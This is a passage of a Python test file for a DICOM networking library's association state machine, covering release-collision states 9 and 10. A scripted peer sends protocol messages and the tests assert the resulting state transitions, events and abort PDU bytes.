('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta10')
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
# Sta10 + Evt13 -> AR-10 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
